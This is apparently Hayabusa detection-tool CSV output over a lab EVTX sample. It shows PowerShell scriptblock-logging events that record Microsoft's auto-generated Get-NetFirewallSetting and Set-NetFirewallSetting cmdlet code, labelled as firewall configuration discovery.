$__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Exemptions')) { [object]$__cmdletization_value = ${Exemptions} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Exemptions'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Exemptions'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnableStatefulFtp')) { [object]$__cmd",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
2021-10-25 16:23:06.145 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,letization_value = ${EnableStatefulFtp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnableStatefulFtp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnableStatefulFtp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnableStatefulPptp')) { [object]$__cmdletization_value = ${EnableStatefulPptp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnableStatefulPptp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnableStatefulPptp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachineTransportAuthorizationList')) { [object]$__cmdletization_value = ${RemoteMachineTransportAuthorizationList} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteMachineTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteMachineTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachineTunnelAuthorizationList')) { [object]$__cmdletization_value = ${RemoteMachineTunnelAuthorizationList} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteMachineTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteMachineTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUserTransportAuthorizationList')) { [object]$__cmdletization_value = ${RemoteUserTransportAuthorizationList} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteUserTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteUserTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUserTunnelAuthorizationList')) { [object]$__cmdletization_value = ${RemoteUserTunnelAuthorizationList} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteUserTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteUserTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RequireFullAuthSupport')) { [object]$__cmdletization_value = ${RequireFullAuthSupport} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RequireFullAuthSupport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RequireFullAuthSupport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('CertValidationLevel')) { [object]$__cmdletization_value = ${CertValidationLevel} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'CertValidationLevel'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'CertValidationLevel'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowIPsecThroughNAT')) { [object]$__cmdletization_value = ${AllowIPsecThroughNAT} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowIPsecThroughNAT'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowIPsecThroughNAT'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxSAIdleTimeSeconds')) { [object]$__cmdletization_value = ${MaxSAIdleTimeSeconds} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxSAIdleTimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxSAIdleTimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('KeyEncoding')) { [object]$__cmdletization_value = ${KeyEncoding} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'KeyEncoding'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'KeyEncoding'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnablePacketQueuing')) { [object]$__cmdletization_value = ${EnablePacketQueuing} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnablePacketQueuing'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnablePacketQueuing'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdleti,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
2021-10-25 16:23:06.145 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"zation_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if
($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallSetting'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.145 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 
16:23:06.145 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-NetFirewallSetting { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetSecuritySettingData')] param( [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSetting.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.145 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Set-NetFirewallSetting { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetSecuritySettingData')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetSecuritySettingData')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption] ${Exemptions}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${EnableStatefulFtp}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${EnableStatefulPptp}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachineTransportAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachineTunnelAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUserTransportAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUserTunnelAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${RequireFullAuthSupport}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck] ${CertValidationLevel}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT] ${AllowIPsecThroughNAT}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxSAIdleTimeSeconds}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding] ${KeyEncoding}, 
[Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing] ${EnablePacketQueuing}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if 
($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Exemptions')) { [object]$__cmdletization_value = ${Exemptions} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Exemptions'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Exemptions'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnableStatefulFtp')) { [object]$__cmdletization_value = ${EnableStatefulFtp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnableStatefulFtp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { 
$__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnableStatefulFtp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnableStatefulPptp')) { [object]$__cmdletization_value = ${EnableStatefulPptp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnableStatefulPptp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnableStatefulPptp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachineTransportAuthorizationList')) { [object]$__cmdletization_value = ${RemoteMachineTransportAuthorizationList} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteMachineTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = 
$true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteMachineTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachineTunnelAuthorizationList')) { [object]$__cmdletization_value = ${RemoteMachineTunnelAuthorizationList} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteMachineTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteMachineTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUserTransportAuthorizationList')) { [object]$__cmdletization_value = ${RemoteUserTransportAuthorizationList} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteUserTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 
